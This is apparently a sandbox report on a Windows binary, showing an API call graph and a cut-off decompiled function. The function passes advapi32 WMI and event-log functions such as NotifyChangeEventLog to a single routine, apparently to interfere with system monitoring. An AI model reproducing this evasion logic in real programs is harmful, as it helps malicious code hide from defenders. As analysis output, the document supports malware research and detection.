calls 18777->18778 18778->18776 18780 2522a0d 18779->18780 18785 2522a48 18780->18785 18782 2522a29 18782->18468 18784 25180b1 18783->18784 18784->18469 18786 2522a63 18785->18786 18787 2522a8a 18786->18787 18788 2522b08 18786->18788 18790 2522aa3 CreateFileA 18787->18790 18828 2518010 18788->18828 18791 2522ab4 18790->18791 18792 2522b01 18791->18792 18809 2518218 18791->18809 18795 25148f4 11 API calls 18792->18795 18793 2522b12 18793->18792 18796 2518218 12 API calls 18793->18796 18799 2522b75 18795->18799 18797 2522b2d GetLastError 18796->18797 18800 251a984 12 API calls 18797->18800 
18804 25148c4 11 API calls 18799->18804 18802 2522b44 18800->18802 18805 251b290 42 API calls 18802->18805 18807 2522b8f 18804->18807 18808 2522b66 18805->18808 18807->18782 18808->18792 18810 2518236 GetFullPathNameA 18809->18810 18811 2514d64 18809->18811 18812 2514990 11 API calls 18810->18812 18811->18810 18813 2518249 GetLastError 18812->18813 18814 251a984 FormatMessageA 18813->18814 18815 251a9aa 18814->18815 18816 2514990 11 API calls 18815->18816 18817 251a9c8 18816->18817 18818 251b290 18817->18818 18819 251b29e 18818->18819 18832 251659c 18819->18832 18821 251b2c8 18838 251886c 18821->18838 18824 25148f4 11 API calls 18825 251b2e1 18824->18825 18826 25148c4 11 API calls 18825->18826 18827 251b2fb 18826->18827 18827->18792 18829 2518063 18828->18829 18830 2518024 18828->18830 18829->18793 18830->18829 18831 251805d CreateFileA 18830->18831 18831->18829 18833 25165ad 18832->18833 18834 25165de 18832->18834 18833->18834 18841 2515af0 18833->18841 18834->18821 18837 2514990 11 API calls 18837->18834 18884 2518880 18838->18884 18842 2515b15 LoadStringA 18841->18842 18843 2515aff 18841->18843 18842->18837 18843->18842 18845 2515aa8 18843->18845 18846 2515ad4 18845->18846 18847 2515ab8 GetModuleFileNameA 18845->18847 18846->18842 18849 2515d0c GetModuleFileNameA RegOpenKeyExA 18847->18849 18850 2515d8f 18849->18850 18851 2515d4f RegOpenKeyExA 18849->18851 18867 2515b48 GetModuleHandleA 18850->18867 18851->18850 18852 2515d6d RegOpenKeyExA 18851->18852 18852->18850 18854 2515e18 lstrcpynA GetThreadLocale GetLocaleInfoA 18852->18854 18856 2515f32 18854->18856 18857 2515e4f 18854->18857 18856->18846 18857->18856 18860 2515e5f lstrlenA 18857->18860 18858 2515dd4 RegQueryValueExA 18859 2515df2 RegCloseKey 18858->18859 18859->18846 18862 2515e77 18860->18862 18862->18856 18863 2515ec4 18862->18863 18864 2515e9c lstrcpynA LoadLibraryExA 18862->18864 18863->18856 18865 2515ece lstrcpynA LoadLibraryExA 18863->18865 18864->18863 18865->18856 18866 2515f00 lstrcpynA 

                                                                Control-flow Graph

                                                                C-Code - Quality: 55%
                                                                			E02525DE4(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                				char _v100;
                                                                				char _v104;
                                                                				char _v108;
                                                                				char _v112;
                                                                				char _v116;
                                                                				char _v120;
                                                                				char _v124;
                                                                				char _v128;
                                                                				char _v132;
                                                                				char _v136;
                                                                				char _v140;
                                                                				char _v144;
                                                                				char _v148;
                                                                				char _v152;
                                                                				char _v156;
                                                                				char _v160;
                                                                				char _v164;
                                                                				char _v168;
                                                                				char _v172;
                                                                				char _v176;
                                                                				char _v180;
                                                                				char _v184;
                                                                				char _v188;
                                                                				char _v192;
                                                                				char _v196;
                                                                				char _v200;
                                                                				char _v204;
                                                                				char _v208;
                                                                				char _v212;
                                                                				char _v216;
                                                                				char _v220;
                                                                				char _v224;
                                                                				char _v228;
                                                                				char _v232;
                                                                				char _v236;
                                                                				char _v240;
                                                                				char _v244;
                                                                				char _v248;
                                                                				char _v252;
                                                                				char _v256;
                                                                				char _v260;
                                                                				char _v264;
                                                                				char _v268;
                                                                				char _v272;
                                                                				char _v276;
                                                                				char _v280;
                                                                				char _v284;
                                                                				char _v288;
                                                                				char _v292;
                                                                				char _v296;
                                                                				char _v300;
                                                                				char _v304;
                                                                				char _v308;
                                                                				char _v312;
                                                                				char _v316;
                                                                				char _v320;
                                                                				char _v324;
                                                                				char _v328;
                                                                				char _v332;
                                                                				char _v336;
                                                                				char _v340;
                                                                				char _v344;
                                                                				char _v348;
                                                                				char _v352;
                                                                				char _v356;
                                                                				char _v360;
                                                                				char _v364;
                                                                				char _v368;
                                                                				char _v372;
                                                                				char _v376;
                                                                				char _v380;
                                                                				char _v384;
                                                                				char _v388;
                                                                				char _v392;
                                                                				char _v396;
                                                                				char _v400;
                                                                				char _v404;
                                                                				char _v408;
                                                                				char _v412;
                                                                				char _v416;
                                                                				char _v420;
                                                                				char _v424;
                                                                				char _v428;
                                                                				char _v432;
                                                                				char _v436;
                                                                				char _v440;
                                                                				char _v444;
                                                                				char _v448;
                                                                				char _v452;
                                                                				char _v456;
                                                                				char _v460;
                                                                				char _v464;
                                                                				char _v468;
                                                                				char _v472;
                                                                				char _v476;
                                                                				char _v480;
                                                                				char _v484;
                                                                				char _v488;
                                                                				char _v492;
                                                                				intOrPtr _v496;
                                                                				char _v500;
                                                                				char _v504;
                                                                				char _v508;
                                                                				intOrPtr _v512;
                                                                				char _v516;
                                                                				char _v520;
                                                                				char _v524;
                                                                				intOrPtr _v528;
                                                                				char _v532;
                                                                				char _v536;
                                                                				char _v540;
                                                                				intOrPtr _v544;
                                                                				char _v548;
                                                                				char _v552;
                                                                				char _v556;
                                                                				char _v560;
                                                                				intOrPtr* _v564;
                                                                				char _v568;
                                                                				intOrPtr _v572;
                                                                				char _v576;
                                                                				char _v580;
                                                                				char _v584;
                                                                				intOrPtr _v588;
                                                                				char _v592;
                                                                				char _v596;
                                                                				char _v600;
                                                                				intOrPtr _v604;
                                                                				char _v608;
                                                                				char _v612;
                                                                				char _v616;
                                                                				intOrPtr _v620;
                                                                				char _v624;
                                                                				char _v628;
                                                                				char _v632;
                                                                				char _v636;
                                                                				char _v640;
                                                                				char _v644;
                                                                				char _v648;
                                                                				char _v652;
                                                                				char _v656;
                                                                				char _v660;
                                                                				char _v664;
                                                                				char _v668;
                                                                				char _v672;
                                                                				char _v676;
                                                                				char _v680;
                                                                				char _v684;
                                                                				char _v688;
                                                                				char _v692;
                                                                				char _v696;
                                                                				char _v700;
                                                                				char _v704;
                                                                				char _v708;
                                                                				intOrPtr _v712;
                                                                				char _v716;
                                                                				char _v720;
                                                                				char _v724;
                                                                				intOrPtr _v728;
                                                                				char _v732;
                                                                				char _v736;
                                                                				char _v740;
                                                                				intOrPtr _v744;
                                                                				char _v748;
                                                                				char _v752;
                                                                				char _v756;
                                                                				intOrPtr _v760;
                                                                				char _v764;
                                                                				char _v768;
                                                                				char _v772;
                                                                				char _v776;
                                                                				char _v780;
                                                                				intOrPtr _v784;
                                                                				char _v788;
                                                                				char _v792;
                                                                				char _v796;
                                                                				char _v800;
                                                                				char _v804;
                                                                				intOrPtr _v808;
                                                                				char _v812;
                                                                				char _v816;
                                                                				char _v820;
                                                                				intOrPtr _v824;
                                                                				char _v828;
                                                                				char _v832;
                                                                				char _v836;
                                                                				intOrPtr _v840;
                                                                				char _v844;
                                                                				char _v848;
                                                                				char _v852;
                                                                				char _v856;
                                                                				char _v860;
                                                                				intOrPtr _v864;
                                                                				char _v868;
                                                                				char _v872;
                                                                				char _v876;
                                                                				intOrPtr _v880;
                                                                				char _v884;
                                                                				char _v888;
                                                                				intOrPtr _v892;
                                                                				char _v896;
                                                                				char _v900;
                                                                				char _v904;
                                                                				intOrPtr _v908;
                                                                				char _v912;
                                                                				char _v916;
                                                                				intOrPtr _v920;
                                                                				char _v924;
                                                                				intOrPtr _v928;
                                                                				char _v932;
                                                                				intOrPtr _v936;
                                                                				char _v940;
                                                                				char _v944;
                                                                				char _v948;
                                                                				intOrPtr _v952;
                                                                				char _v956;
                                                                				char _v960;
                                                                				char _v964;
                                                                				char _v968;
                                                                				char _v972;
                                                                				char _v976;
                                                                				char _v980;
                                                                				char _v984;
                                                                				char _v988;
                                                                				char _v992;
                                                                				char _v996;
                                                                				intOrPtr _v1000;
                                                                				char _v1004;
                                                                				char _v1008;
                                                                				void* _v1012;
                                                                				char _v1016;
                                                                				char _v1020;
                                                                				char _v1024;
                                                                				char _v1028;
                                                                				char _v1032;
                                                                				intOrPtr _v1036;
                                                                				char _v1040;
                                                                				char _v1076;
                                                                				intOrPtr _v1080;
                                                                				char _v1084;
                                                                				char _v1088;
                                                                				char _v1092;
                                                                				intOrPtr _v1096;
                                                                				char _v1100;
                                                                				char _v1104;
                                                                				char _v1108;
                                                                				intOrPtr _v1112;
                                                                				char _v1116;
                                                                				char _v1120;
                                                                				char _v1124;
                                                                				intOrPtr _v1128;
                                                                				char _v1132;
                                                                				char _v1136;
                                                                				intOrPtr _v1140;
                                                                				char _v1144;
                                                                				char _v1148;
                                                                				char _v1152;
                                                                				intOrPtr _v1156;
                                                                				char _v1160;
                                                                				char _v1164;
                                                                				char _v1168;
                                                                				intOrPtr _v1172;
                                                                				char _v1176;
                                                                				char _v1180;
                                                                				intOrPtr _v1184;
                                                                				intOrPtr _v1188;
                                                                				intOrPtr _v1192;
                                                                				char _v1196;
                                                                				intOrPtr _v1200;
                                                                				char _v1204;
                                                                				char _v1208;
                                                                				char _v1212;
                                                                				char _v1216;
                                                                				intOrPtr _v1220;
                                                                				char _v1224;
                                                                				char _v1228;
                                                                				intOrPtr _v1232;
                                                                				char _v1268;
                                                                				char _v1552;
                                                                				intOrPtr _v1556;
                                                                				char _v1560;
                                                                				char _v1564;
                                                                				char _v1568;
                                                                				intOrPtr _v1572;
                                                                				char _v1576;
                                                                				char _v1580;
                                                                				char _v1584;
                                                                				intOrPtr _v1588;
                                                                				char _v1592;
                                                                				char _v1596;
                                                                				char _v1600;
                                                                				char _v1604;
                                                                				intOrPtr _v1608;
                                                                				char _v1704;
                                                                				intOrPtr _v1708;
                                                                				char _v1712;
                                                                				char _v1716;
                                                                				char _v1720;
                                                                				intOrPtr _v1724;
                                                                				char _v1728;
                                                                				char _v1732;
                                                                				char _v1736;
                                                                				intOrPtr _v1740;
                                                                				char _v1744;
                                                                				char _v1748;
                                                                				char _v1752;
                                                                				char _v1756;
                                                                				char _v1760;
                                                                				char _v1764;
                                                                				char _v1768;
                                                                				intOrPtr _v1772;
                                                                				char _v1776;
                                                                				char _v1780;
                                                                				char _v1784;
                                                                				intOrPtr _v1788;
                                                                				char _v1792;
                                                                				char _v1796;
                                                                				char _v1800;
                                                                				intOrPtr _v1804;
                                                                				char _v1808;
                                                                				char _v1812;
                                                                				char _v1816;
                                                                				intOrPtr _v1820;
                                                                				char _v1824;
                                                                				char _v1828;
                                                                				char _v1832;
                                                                				intOrPtr _v1836;
                                                                				char _v1840;
                                                                				char _v1844;
                                                                				char _v1848;
                                                                				intOrPtr _v1852;
                                                                				char _v1856;
                                                                				char _v1860;
                                                                				char _v1864;
                                                                				intOrPtr _v1868;
                                                                				char _v1872;
                                                                				char _v1876;
                                                                				char _v1880;
                                                                				intOrPtr _v1884;
                                                                				char _v1888;
                                                                				char _v1892;
                                                                				char _v1896;
                                                                				char _v1900;
                                                                				char _v1904;
                                                                				intOrPtr _v1908;
                                                                				char _v1912;
                                                                				char _v1916;
                                                                				char _v1920;
                                                                				char _v1924;
                                                                				char _v1928;
                                                                				intOrPtr _v1932;
                                                                				char _v1936;
                                                                				char _v1940;
                                                                				char _v1944;
                                                                				char _v1948;
                                                                				char _v1952;
                                                                				intOrPtr _v1956;
                                                                				char _v1960;
                                                                				char _v1964;
                                                                				char _v1968;
                                                                				intOrPtr _v1972;
                                                                				char _v1976;
                                                                				char _v1980;
                                                                				char _v1984;
                                                                				intOrPtr _v1988;
                                                                				char _v1992;
                                                                				char _v1996;
                                                                				char _v2000;
                                                                				intOrPtr _v2004;
                                                                				char _v2008;
                                                                				char _v2012;
                                                                				char _v2016;
                                                                				intOrPtr _v2020;
                                                                				char _v2024;
                                                                				char _v2028;
                                                                				char _v2032;
                                                                				char _v2036;
                                                                				char _v2040;
                                                                				intOrPtr _v2044;
                                                                				char _v2048;
                                                                				char _v2052;
                                                                				char _v2056;
                                                                				char _v2060;
                                                                				char _v2064;
                                                                				intOrPtr _v2068;
                                                                				char _v2072;
                                                                				char _v2076;
                                                                				char _v2080;
                                                                				char _v2084;
                                                                				char _v2088;
                                                                				intOrPtr _v2092;
                                                                				char _v2096;
                                                                				char _v2100;
                                                                				char _v2104;
                                                                				intOrPtr _v2108;
                                                                				char _v2112;
                                                                				char _v2116;
                                                                				char _v2120;
                                                                				intOrPtr _v2124;
                                                                				char _v2128;
                                                                				char _v2132;
                                                                				char _v2136;
                                                                				intOrPtr _v2140;
                                                                				char _v2144;
                                                                				char _v2148;
                                                                				char _v2152;
                                                                				char _v2156;
                                                                				intOrPtr _v2160;
                                                                				char _v2164;
                                                                				char _v2168;
                                                                				char _v2172;
                                                                				char _v2176;
                                                                				char _v2180;
                                                                				intOrPtr _v2184;
                                                                				char _v2188;
                                                                				char _v2192;
                                                                				char _v2196;
                                                                				char _v2200;
                                                                				char _v2204;
                                                                				intOrPtr _v2208;
                                                                				char _v2212;
                                                                				char _v2216;
                                                                				char _v2220;
                                                                				char _v2224;
                                                                				char _v2228;
                                                                				intOrPtr _v2232;
                                                                				char _v2236;
                                                                				char _v2240;
                                                                				char _v2244;
                                                                				char _v2248;
                                                                				char _v2252;
                                                                				char _v2256;
                                                                				char _v2260;
                                                                				intOrPtr _v2264;
                                                                				char _v2268;
                                                                				char _v2272;
                                                                				char _v2276;
                                                                				intOrPtr _v2280;
                                                                				char _v2284;
                                                                				char _v2288;
                                                                				char _v2292;
                                                                				char _v2296;
                                                                				char _v2300;
                                                                				char _v2304;
                                                                				char _v2308;
                                                                				char _v2312;
                                                                				char _v2316;
                                                                				char _v2320;
                                                                				char _v2324;
                                                                				char _v2328;
                                                                				char _v2332;
                                                                				char _v2336;
                                                                				char _v2340;
                                                                				char _v2344;
                                                                				char _v2348;
                                                                				char _v2352;
                                                                				char _v2356;
                                                                				char _v2360;
                                                                				char _v2364;
                                                                				char _v2368;
                                                                				char _v2372;
                                                                				char _v2376;
                                                                				char _v2380;
                                                                				char _v2384;
                                                                				char _v2388;
                                                                				char _v2392;
                                                                				char _v2396;
                                                                				char _v2400;
                                                                				char _v2404;
                                                                				char _v2408;
                                                                				char _v2412;
                                                                				char _v2416;
                                                                				char _v2420;
                                                                				char _v2424;
                                                                				char _v2428;
                                                                				char _v2432;
                                                                				char _v2436;
                                                                				char _v2440;
                                                                				char _v2444;
                                                                				char _v2448;
                                                                				char _v2452;
                                                                				char _v2456;
                                                                				char _v2460;
                                                                				char _v2464;
                                                                				char _v2468;
                                                                				char _v2472;
                                                                				char _v2476;
                                                                				char _v2480;
                                                                				char _v2484;
                                                                				char _v2488;
                                                                				char _v2492;
                                                                				char _v2496;
                                                                				char _v2500;
                                                                				char _v2504;
                                                                				char _v2508;
                                                                				char _v2512;
                                                                				char _v2516;
                                                                				char _v2520;
                                                                				char _v2524;
                                                                				char _v2528;
                                                                				char _v2532;
                                                                				char _v2536;
                                                                				char _v2540;
                                                                				char _v2544;
                                                                				char _v2548;
                                                                				char _v2552;
                                                                				char _v2556;
                                                                				char _v2560;
                                                                				char _v2564;
                                                                				char _v2568;
                                                                				char _v2572;
                                                                				char _v2576;
                                                                				char _v2580;
                                                                				char _v2584;
                                                                				char _v2588;
                                                                				char _v2592;
                                                                				char _v2596;
                                                                				char _v2600;
                                                                				char _v2604;
                                                                				char _v2608;
                                                                				char _v2612;
                                                                				intOrPtr _v2616;
                                                                				char _v2620;
                                                                				char _v2624;
                                                                				char _v2628;
                                                                				intOrPtr _v2632;
                                                                				char _v2636;
                                                                				char _v2640;
                                                                				char _v2644;
                                                                				char _v2648;
                                                                				char _v2652;
                                                                				char _v2656;
                                                                				char _v2660;
                                                                				char _v2664;
                                                                				char _v2668;
                                                                				char _v2672;
                                                                				void* _t1499;
                                                                				intOrPtr* _t1565;
                                                                				intOrPtr _t1566;
                                                                				intOrPtr _t1582;
                                                                				void* _t1583;
                                                                				char* _t1617;
                                                                				intOrPtr _t1626;
                                                                				void* _t1630;
                                                                				intOrPtr _t1635;
                                                                				void* _t1642;
                                                                				intOrPtr _t1643;
                                                                				intOrPtr _t1647;
                                                                				intOrPtr _t1649;
                                                                				void* _t1650;
                                                                				intOrPtr _t1709;
                                                                				signed char _t1710;
                                                                				intOrPtr _t1712;
                                                                				void* _t1713;
                                                                				intOrPtr _t1714;
                                                                				intOrPtr _t1718;
                                                                				intOrPtr _t1738;
                                                                				intOrPtr _t1804;
                                                                				intOrPtr _t1810;
                                                                				intOrPtr _t1811;
                                                                				intOrPtr _t1827;
                                                                				intOrPtr _t1871;
                                                                				intOrPtr _t1915;
                                                                				intOrPtr _t1919;
                                                                				void* _t1920;
                                                                				intOrPtr _t1921;
                                                                				intOrPtr _t1925;
                                                                				intOrPtr _t2001;
                                                                				intOrPtr _t2017;
                                                                				intOrPtr _t2033;
                                                                				intOrPtr _t2490;
                                                                				intOrPtr _t2492;
                                                                				void* _t2526;
                                                                				void* _t2527;
                                                                				intOrPtr _t2529;
                                                                				intOrPtr _t2531;
                                                                				long _t2564;
                                                                				intOrPtr _t2566;
                                                                				void* _t2582;
                                                                				intOrPtr _t2583;
                                                                				intOrPtr _t2662;
                                                                				intOrPtr _t2664;
                                                                				intOrPtr* _t2766;
                                                                				intOrPtr* _t2770;
                                                                				intOrPtr* _t2820;
                                                                				intOrPtr* _t2827;
                                                                				intOrPtr _t2830;
                                                                				intOrPtr _t2907;
                                                                				intOrPtr _t2913;
                                                                				intOrPtr* _t2925;
                                                                				intOrPtr* _t2932;
                                                                				intOrPtr _t2935;
                                                                				intOrPtr _t2937;
                                                                				intOrPtr _t2979;
                                                                				intOrPtr _t3015;
                                                                				CHAR* _t3016;
                                                                				intOrPtr _t3044;
                                                                				intOrPtr* _t3065;
                                                                				intOrPtr* _t3068;
                                                                				intOrPtr* _t3076;
                                                                				intOrPtr* _t3084;
                                                                				intOrPtr _t3086;
                                                                				intOrPtr* _t3093;
                                                                				intOrPtr _t3096;
                                                                				intOrPtr _t3098;
                                                                				intOrPtr _t3102;
                                                                				intOrPtr _t3104;
                                                                				intOrPtr _t3110;
                                                                				void* _t3117;
                                                                				intOrPtr _t3118;
                                                                				intOrPtr _t3122;
                                                                				intOrPtr _t3145;
                                                                				intOrPtr _t3149;
                                                                				char* _t3190;
                                                                				intOrPtr _t3199;
                                                                				intOrPtr _t3211;
                                                                				intOrPtr* _t3212;
                                                                				intOrPtr _t3213;
                                                                				intOrPtr* _t3215;
                                                                				intOrPtr* _t3216;
                                                                				void* _t3218;
                                                                				intOrPtr _t3221;
                                                                				intOrPtr _t3222;
                                                                				intOrPtr _t3223;
                                                                				intOrPtr _t3224;
                                                                				intOrPtr _t3227;
                                                                				intOrPtr _t3228;
                                                                				intOrPtr _t3229;
                                                                				intOrPtr _t3232;
                                                                				intOrPtr _t3234;
                                                                				intOrPtr _t3235;
                                                                				intOrPtr _t3236;
                                                                				intOrPtr _t3237;
                                                                				intOrPtr _t3239;
                                                                				intOrPtr _t3241;
                                                                				intOrPtr _t3242;
                                                                				intOrPtr _t3243;
                                                                				intOrPtr _t3244;
                                                                				intOrPtr _t3247;
                                                                				intOrPtr _t3248;
                                                                				intOrPtr _t3249;
                                                                				intOrPtr _t3250;
                                                                				intOrPtr _t3251;
                                                                				intOrPtr _t3252;
                                                                				intOrPtr _t3253;
                                                                				intOrPtr _t3256;
                                                                				intOrPtr _t3257;
                                                                				intOrPtr _t3258;
                                                                				intOrPtr _t3259;
                                                                				intOrPtr _t3260;
                                                                				intOrPtr _t3261;
                                                                				intOrPtr _t3262;
                                                                				intOrPtr _t3263;
                                                                				intOrPtr _t3264;
                                                                				intOrPtr _t3265;
                                                                				intOrPtr _t3266;
                                                                				intOrPtr _t3267;
                                                                				intOrPtr _t3268;
                                                                				intOrPtr _t3269;
                                                                				intOrPtr _t3270;
                                                                				intOrPtr _t3271;
                                                                				intOrPtr _t3272;
                                                                				intOrPtr _t3273;
                                                                				intOrPtr _t3274;
                                                                				intOrPtr _t3275;
                                                                				intOrPtr _t3276;
                                                                				intOrPtr _t3277;
                                                                				intOrPtr _t3278;
                                                                				intOrPtr _t3279;
                                                                				intOrPtr _t3280;
                                                                				intOrPtr _t3281;
                                                                				intOrPtr _t3282;
                                                                				intOrPtr _t3283;
                                                                				intOrPtr _t3284;
                                                                				intOrPtr _t3285;
                                                                				intOrPtr _t3286;
                                                                				intOrPtr _t3287;
                                                                				intOrPtr _t3292;
                                                                				intOrPtr _t3293;
                                                                				intOrPtr _t3294;
                                                                				intOrPtr _t3295;
                                                                				intOrPtr _t3302;
                                                                				intOrPtr _t3303;
                                                                				intOrPtr _t3304;
                                                                				intOrPtr _t3305;
                                                                				intOrPtr _t3307;
                                                                				intOrPtr _t3318;
                                                                				intOrPtr _t3320;
                                                                				intOrPtr _t3322;
                                                                				intOrPtr _t3330;
                                                                				intOrPtr _t3332;
                                                                				intOrPtr _t3334;
                                                                				void* _t3340;
                                                                				void* _t3343;
                                                                				void* _t3346;
                                                                				void* _t3349;
                                                                				void* _t3352;
                                                                				void* _t3355;
                                                                				void* _t3358;
                                                                				void* _t3361;
                                                                				void* _t3364;
                                                                				void* _t3367;
                                                                				void* _t3370;
                                                                				void* _t3373;
                                                                				void* _t3376;
                                                                				void* _t3379;
                                                                				void* _t3382;
                                                                				void* _t3385;
                                                                				void* _t3388;
                                                                				void* _t3391;
                                                                				void* _t3394;
                                                                				void* _t3397;
                                                                				void* _t3400;
                                                                				void* _t3403;
                                                                				void* _t3406;
                                                                				void* _t3409;
                                                                				void* _t3412;
                                                                				void* _t3415;
                                                                				void* _t3418;
                                                                				void* _t3421;
                                                                				void* _t3424;
                                                                				void* _t3427;
                                                                				void* _t3430;
                                                                				void* _t3433;
                                                                				void* _t3436;
                                                                				void* _t3439;
                                                                				void* _t3442;
                                                                				void* _t3445;
                                                                				void* _t3448;
                                                                				void* _t3451;
                                                                				void* _t3454;
                                                                				void* _t3457;
                                                                				void* _t3460;
                                                                				void* _t3463;
                                                                				void* _t3466;
                                                                				void* _t3469;
                                                                				void* _t3472;
                                                                				void* _t3475;
                                                                				void* _t3478;
                                                                				void* _t3481;
                                                                				void* _t3484;
                                                                				void* _t3490;
                                                                				void* _t3495;
                                                                				void* _t3500;
                                                                				void* _t3505;
                                                                				void* _t3514;
                                                                				void* _t3519;
                                                                				void* _t3524;
                                                                				intOrPtr _t3532;
                                                                				void* _t3540;
                                                                				void* _t3545;
                                                                				void* _t3550;
                                                                				void* _t3556;
                                                                				void* _t3565;
                                                                				intOrPtr _t3566;
                                                                				intOrPtr _t3569;
                                                                				intOrPtr _t3571;
                                                                				intOrPtr _t3573;
                                                                				intOrPtr _t3575;
                                                                				intOrPtr _t3577;
                                                                				intOrPtr _t3579;
                                                                				intOrPtr _t3581;
                                                                				intOrPtr _t3583;
                                                                				intOrPtr _t3585;
                                                                				void* _t3591;
                                                                				void* _t3596;
                                                                				void* _t3601;
                                                                				void* _t3609;
                                                                				void* _t3615;
                                                                				void* _t3620;
                                                                				void* _t3625;
                                                                				void* _t3631;
                                                                				void* _t3636;
                                                                				void* _t3641;
                                                                				intOrPtr _t3642;
                                                                				void* _t3653;
                                                                				void* _t3658;
                                                                				void* _t3663;
                                                                				void* _t3668;
                                                                				void* _t3673;
                                                                				void* _t3679;
                                                                				void* _t3685;
                                                                				void* _t3691;
                                                                				void* _t3694;
                                                                				void* _t3699;
                                                                				void* _t3702;
                                                                				void* _t3707;
                                                                				void* _t3710;
                                                                				void* _t3715;
                                                                				void* _t3718;
                                                                				void* _t3721;
                                                                				void* _t3726;
                                                                				void* _t3731;
                                                                				void* _t3734;
                                                                				void* _t3737;
                                                                				void* _t3740;
                                                                				void* _t3743;
                                                                				void* _t3746;
                                                                				void* _t3749;
                                                                				void* _t3752;
                                                                				void* _t3755;
                                                                				void* _t3758;
                                                                				void* _t3761;
                                                                				void* _t3764;
                                                                				void* _t3767;
                                                                				void* _t3770;
                                                                				void* _t3773;
                                                                				void* _t3776;
                                                                				void* _t3779;
                                                                				void* _t3782;
                                                                				void* _t3785;
                                                                				void* _t3788;
                                                                				void* _t3791;
                                                                				void* _t3794;
                                                                				void* _t3797;
                                                                				void* _t3800;
                                                                				void* _t3803;
                                                                				void* _t3806;
                                                                				void* _t3809;
                                                                				void* _t3812;
                                                                				void* _t3815;
                                                                				void* _t3818;
                                                                				void* _t3821;
                                                                				void* _t3824;
                                                                				void* _t3827;
                                                                				void* _t3830;
                                                                				void* _t3833;
                                                                				void* _t3836;
                                                                				void* _t3839;
                                                                				void* _t3842;
                                                                				void* _t3845;
                                                                				void* _t3848;
                                                                				void* _t3851;
                                                                				void* _t3856;
                                                                				void* _t3861;
                                                                				void* _t3864;
                                                                				void* _t3867;
                                                                				void* _t3870;
                                                                				void* _t3873;
                                                                				void* _t3880;
                                                                				void* _t3885;
                                                                				void* _t3894;
                                                                				void* _t3899;
                                                                				void* _t3904;
                                                                				void* _t3910;
                                                                				void* _t3913;
                                                                				void* _t3918;
                                                                				void* _t3921;
                                                                				void* _t3926;
                                                                				void* _t3929;
                                                                				void* _t3934;
                                                                				void* _t3941;
                                                                				void* _t3946;
                                                                				void* _t3951;
                                                                				void* _t3954;
                                                                				void* _t3959;
                                                                				void* _t3962;
                                                                				void* _t3967;
                                                                				void* _t3970;
                                                                				void* _t3978;
                                                                				void* _t3983;
                                                                				void* _t3988;
                                                                				intOrPtr _t3995;
                                                                				void* _t4000;
                                                                				void* _t4005;
                                                                				void* _t4010;
                                                                				void* _t4021;
                                                                				intOrPtr _t4024;
                                                                				intOrPtr _t4027;
                                                                				intOrPtr _t4029;
                                                                				intOrPtr _t4036;
                                                                				void* _t4044;
                                                                				void* _t4049;
                                                                				void* _t4058;
                                                                				void* _t4063;
                                                                				void* _t4067;
                                                                				void* _t4070;
                                                                				void* _t4073;
                                                                				void* _t4080;
                                                                				intOrPtr _t4095;
                                                                				intOrPtr _t4101;
                                                                				void* _t4107;
                                                                				void* _t4110;
                                                                				void* _t4113;
                                                                				void* _t4120;
                                                                				void* _t4123;
                                                                				void* _t4126;
                                                                				void* _t4131;
                                                                				intOrPtr _t4132;
                                                                				void* _t4137;
                                                                				intOrPtr _t4140;
                                                                				intOrPtr _t4141;
                                                                				intOrPtr* _t4149;
                                                                				void* _t4158;
                                                                
                                                                				_t4158 = __fp0;
                                                                				_t4138 = __esi;
                                                                				_t4137 = __edi;
                                                                				_t3210 = __ebx;
                                                                				_t4140 = _t4141;
                                                                				_t3218 = 0x14d;
                                                                				do {
                                                                					_push(0);
                                                                					_push(0);
                                                                					_t3218 = _t3218 - 1;
                                                                				} while (_t3218 != 0);
                                                                				_push(_t3218);
                                                                				_push(__ebx);
                                                                				_push(_t4140);
                                                                				_push(0x252a8da);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t4141;
                                                                				if(E0251304C(0x270e) == 1) {
                                                                					L51:
                                                                					__eflags = 0;
                                                                					_pop(_t3322);
                                                                					 *[fs:eax] = _t3322;
                                                                					_push(E0252A8E4);
                                                                					E025148C4( &_v2672, 0x64);
                                                                					E025148C4( &_v2272, 0x63);
                                                                					E025148A0( &_v1864);
                                                                					E025148C4( &_v1876, 3);
                                                                					E025148C4( &_v1860, 0x54);
                                                                					E025148C4( &_v1268, 0xd);
                                                                					E025148C4( &_v1216, 0x64);
                                                                					E025148C4( &_v816, 5);
                                                                					_t3330 =  *0x25251f8; // 0x25251fc
                                                                					E02515A10( &_v796, _t3330);
                                                                					E025148C4( &_v792, 0x1e);
                                                                					_t3332 =  *0x25251f8; // 0x25251fc
                                                                					E02515A10( &_v672, _t3332);
                                                                					E025148C4( &_v668, 8);
                                                                					_t3334 =  *0x25251f8; // 0x25251fc
                                                                					E02515A10( &_v636, _t3334);
                                                                					E025148C4( &_v632, 0x11);
                                                                					E025148C4( &_v560, 0x24);
                                                                					E025148A0( &_v412);
                                                                					E025148A0( &_v416);
                                                                					return E025148C4( &_v408, 0x4e);
                                                                				} else {
                                                                					E02513024();
                                                                					E02514A98( &_v100, "WmiReceiveNotificationsW");
                                                                					_push(_v100);
                                                                					E02514A98( &_v104, "advapi32");
                                                                					_pop(_t3340); // executed
                                                                					E025236CC(_v104, __ebx, _t3340, __esi); // executed
                                                                					E02514A98( &_v108, "WmiReceiveNotificationsA");
                                                                					_push(_v108);
                                                                					E02514A98( &_v112, "advapi32");
                                                                					_pop(_t3343); // executed
                                                                					E025236CC(_v112, __ebx, _t3343, __esi); // executed
                                                                					E02514A98( &_v116, "WmiQuerySingleInstanceW");
                                                                					_push(_v116);
                                                                					E02514A98( &_v120, "advapi32");
                                                                					_pop(_t3346);
                                                                					E025236CC(_v120, __ebx, _t3346, __esi);
                                                                					E02514A98( &_v124, "NotifyChangeEventLog");
                                                                					_push(_v124);
                                                                					E02514A98( &_v128, "advapi32");
                                                                					_pop(_t3349);
                                                                					E025236CC(_v128, _t3210, _t3349, __esi);
                                                                					E02514A98( &_v132, "WmiQueryAllDataA");
                                                                					_push(_v132);
                                                                					E02514A98( &_v136, "advapi32");
                                                                					_pop(_t3352);
                                                                					E025236CC(_v136, _t3210, _t3352, _t4138);
                                                                					E02514A98( &_v140, "WmiOpenBlock");
                                                                					_push(_v140);
                                                                					E02514A98( &_v144, "advapi32");
                                                                					_pop(_t3355);
                                                                					E025236CC(_v144, _t3210, _t3355, _t4138);
                                                                					E02514A98( &_v148, "WmiNotificationRegistrationW");
                                                                					_push(_v148);
                                                                					E02514A98( &_v152, "advapi32");
                                                                					_pop(_t3358);
                                                                					E025236CC(_v152, _t3210, _t3358, _t4138);
